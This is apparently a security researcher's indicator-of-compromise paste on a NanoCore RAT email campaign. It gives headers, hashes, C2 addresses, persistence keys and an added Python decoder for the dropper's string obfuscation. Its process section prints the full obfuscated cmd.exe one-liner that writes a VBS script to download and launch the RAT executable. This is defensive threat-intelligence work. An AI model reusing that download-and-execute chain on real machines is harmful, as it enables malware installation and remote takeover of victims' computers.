#nanocore_050819

VRad Aug 7th, 2019 (edited) 169 Never
#IOC #OptiData #VR #nanocore #RAT #macro

https://pastebin.com/yiaWaNvQ

previous_contact:
25/04/19    https://pastebin.com/cSy68j5q
07/01/19    https://pastebin.com/e5f24Y8F

FAQ:        https://krebsonsecurity.com/2018/02/bot-roundup-avalanche-kronos-nanocore/

attack_vector
--------------
email attach .DOC > macro > GET JS > GET exe

email_headers
--------------
Received: from lrwdd2.directrouter.com (lrwdd2.directrouter.com [206.123.119.186])
Date: Mon, 05 Aug 2019 04:22:00 -0500
From: cellardoor@palmerwines.com.au
To: user00@victim77.com
Subject: Fwd: Purchasing Oder
X-Sender: cellardoor@palmerwines.com.au
User-Agent: Roundcube Webmail/1.3.8

files
--------------
SHA-256     ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c
File name   PO URGENT.doc
File size   508 KB (520192 bytes)

SHA-256     1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f
File name   azz.js
File size   80.05 KB (81970 bytes)

SHA-256     b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7
File name   hercilio.exe
File size   203 KB (207872 bytes)

activity
--------------
PL_SCR
h11ps\kcexports{.} me/azz.js
h11ps\kcexports{.} me/hercilio.exe

C2
67.207.93.17
185.244.31.111  1606

netwrk
--------------
[ssl]
167.71.13.65    kcexports.me    Client Hello

comp
--------------
WINWORD.EXE 2888    TCP localhost   49217   162.255.119.195 443     SYN_SENT
wscript.exe 1124    TCP localhost   49219   162.255.119.195 443     SYN_SENT
wscript.exe 2664    TCP localhost   49222   67.207.93.17    7744    SYN_SENT
EJV.EXE     1368    TCP localhost   49226   185.244.31.111  1606    SYN_SENT

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\WScript.exe" "C:\tmp\mczekg5e.js"
"C:\Windows\System32\wscript.exe" //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"
"C:\Windows\System32\cmd.exe" /c cd %temp% &@echo Y3x = " h11ps\kcexports{.} me/hercilio.exe">>B3g.vbs &@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &@echo S5z.send ("")>>B3g.vbs &@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs &@echo J8g.Open>>B3g.vbs &@echo J8g.Type = 1 >>B3g.vbs &@echo J8g.Write S5z.ResponseBody>>B3g.vbs & @echo J8g.Position = 0 >>B3g.vbs &@echo J8g.SaveToFile W8r, 2 >>B3g.vbs &@echo J8g.Close>>B3g.vbs  &@echo function M8m(H7m) >> B3g.vbs &@echo For B6c = 1 To Len(H7m) >>B3g.vbs &@echo E7e = Mid(H7m, B6c, 1) >>B3g.vbs &@echo E7e = Chr(Asc(E7e)- 37) >>B3g.vbs &@echo O9c = O9c + E7e >> B3g.vbs &@echo Next >>B3g.vbs &@echo M8m = O9c >>B3g.vbs &@echo End Function >>B3g.vbs& B3g.vbs &dEl B3g.vbs & timeout 13 & EJV.EXE
"C:\Windows\System32\WScript.exe" "C:\tmp\B3g.vbs"
C:\Windows\SysWOW64\timeout  13
C:\tmp\EJV.EXE
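
The cmd.exe line in the proc section writes B3g.vbs with every sensitive string passed through M8m(), which rebuilds the text as Chr(Asc(c) - 37), i.e. a fixed shift of 37 code points. The following Python helper is an added analysis aid, not code from the paste or from the sample: it reverses that shift over the four literals copied from the one-liner so an analyst can read which COM objects and HTTP verb the VBS stage instantiates. The regex, the function names and the SAMPLE_CMDLINE fragment (a cut-down copy of the page's own command line) are assumptions made for illustration.

```python
"""
Reverse the Chr(Asc(c) - 37) string obfuscation used by the dropper's M8m()
helper (taken from the cmd.exe one-liner in the 'proc' section) so the
obfuscated arguments can be read during triage.
"""
import re

# Shift constant lifted from the VBS:  E7e = Chr(Asc(E7e) - 37)
M8M_SHIFT = 37

# Fragment of the page's cmd.exe command line containing the M8m("...") calls
# (constructed excerpt for this example; the original writes many more lines)
SAMPLE_CMDLINE = (
    '@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &'
    '@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &'
    '@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &'
    '@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs'
)

# Regex for the call pattern as it appears in the one-liner (assumed form)
M8M_CALL = re.compile(r'M8m\("([^"]*)"\)')


def m8m_decode(obfuscated: str, shift: int = M8M_SHIFT) -> str:
    """Apply the same transform the VBS applies: subtract the shift per char."""
    return "".join(chr(ord(c) - shift) for c in obfuscated)


def m8m_encode(plain: str, shift: int = M8M_SHIFT) -> str:
    """Inverse transform, used only to confirm a recovered string round-trips."""
    return "".join(chr(ord(c) + shift) for c in plain)


def extract_m8m_args(command_line: str) -> list:
    """Return every quoted M8m() argument in the order it appears."""
    return M8M_CALL.findall(command_line)


def decode_command_line(command_line: str) -> dict:
    """Map each obfuscated literal found in the command line to its plaintext."""
    return {arg: m8m_decode(arg) for arg in extract_m8m_args(command_line)}


def summarize(command_line: str) -> str:
    """One-line triage summary built from the decoded literals."""
    decoded = list(decode_command_line(command_line).values())
    return " | ".join(decoded)


if __name__ == "__main__":
    for obf, plain in decode_command_line(SAMPLE_CMDLINE).items():
        print(f'{obf!r:22} -> {plain}')
    print(summarize(SAMPLE_CMDLINE))
```

Decoding shows the VBS stage resolves to an MSXML2.XMLHTTP GET of the second-stage URL, an ADODB.STREAM SaveToFile into EJV.EXE, and then the `timeout 13 & EJV.EXE` launch already visible in the one-liner; the same four plaintexts are what a sandbox or EDR would see at CreateObject time, which is a more robust hunting key than the randomized variable names.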

persist
--------------
@HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run             05.08.2019 18:05

    ARP Service         c:\users\operator\appdata\roaming\9907dcbd-0284-49da-87e9-3f380347acb7\arp service\arpsv.exe    22.02.2015 3:49

    KQWPXSGZoR          c:\users\operator\appdata\roaming\kqwpxsgzor.js 05.08.2019 18:04
wscript.exe //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"

@C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup                05.08.2019 18:04

    KQWPXSGZoR.js           c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\kqwpxsgzor.js   05.08.2019 18:04

drop
--------------
%temp%\mczekg5e.js  [azz[1].js]
%temp%\B3g.vbs
%temp%\EJV.EXE      [hercilio[1].exe]
C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js
C:\Users\operator\AppData\Roaming\9907DCBD-0284-49DA-87E9-3F380347ACB7\ARP Service\arpsv.exe
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KQWPXSGZoR.js

# # #
https://www.virustotal.com/gui/file/ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c/details
https://www.virustotal.com/gui/file/1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f/details
https://www.virustotal.com/gui/file/b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7/details
https://analyze.intezer.com/#/analyses/919c9d77-4d63-4f96-a35b-0a5435c1297d

VR

@